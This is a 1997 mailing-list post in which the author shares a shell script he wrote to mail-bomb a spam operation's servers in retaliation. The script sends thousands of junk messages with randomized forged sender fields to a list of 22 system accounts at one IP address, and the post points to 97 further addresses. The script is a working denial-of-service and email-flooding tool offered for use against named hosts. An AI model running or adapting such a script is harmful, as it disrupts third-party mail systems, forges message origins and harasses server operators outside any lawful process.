[OFFTOPIC] to whom to complain (was Re: UseNet Gateway One Way ok?)

Trevor Johnson (trevor@jpj.net)
Sun, 25 May 1997 21:23:56 +0000 (Local time zone must be set--see zic manual pagtrevor@jpj.net


> So did I. Got 4 of 'em already. You would think that there's enough
> expertise in this group to cut off cyberpromo from the Internet for a
> couple of weeks.. just a thought :)

Here's a little script I wrote last night which sends complaints to them.
I used /dev/zero because my modem can compress it well; someone with a
better connection to the Net could use /dev/urandom in its place, thus
making the contents of each message unique. I also have a collection of
97 e-mail addresses at agis.net which were working on Friday. It's at
http://jpj.net/~trevor/please_ignore/freunden.txt . Unfortunately,
agisgate.agis.net, www.agis.net, alltel.net and the 205.199.2.2XX
addresses seem to be off the air right now.

#!/bin/sh
for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20;
do
for j in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20;
do
for k in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20;
do
mmencode /dev/zero|head -1000|sendmail -f `mmencode /dev/urandom|head -1`\
-F `mmencode /dev/urandom|head -1` `cat recipients`
sleep 20
done
done
done

The recipients file contains these apparently working addresses I found
yesterday evening.

bin@[205.199.2.251]
daemon@[205.199.2.251]
demo@[205.199.2.251]
games@[205.199.2.251]
hostmaster@[205.199.2.251]
ingres@[205.199.2.251]
manager@[205.199.2.251]
news@[205.199.2.251]
nobody@[205.199.2.251]
nonroot@[205.199.2.251]
operator@[205.199.2.251]
postmaster@[205.199.2.251]
root@[205.199.2.251]
servint@[205.199.2.251]
sys@[205.199.2.251]
system@[205.199.2.251]
toor@[205.199.2.251]
uucp@[205.199.2.251]
wallace@[205.199.2.251]
web@[205.199.2.251]
webmaster@[205.199.2.251]
www@[205.199.2.251]
___
Trevor Johnson <trevor@jpj.net>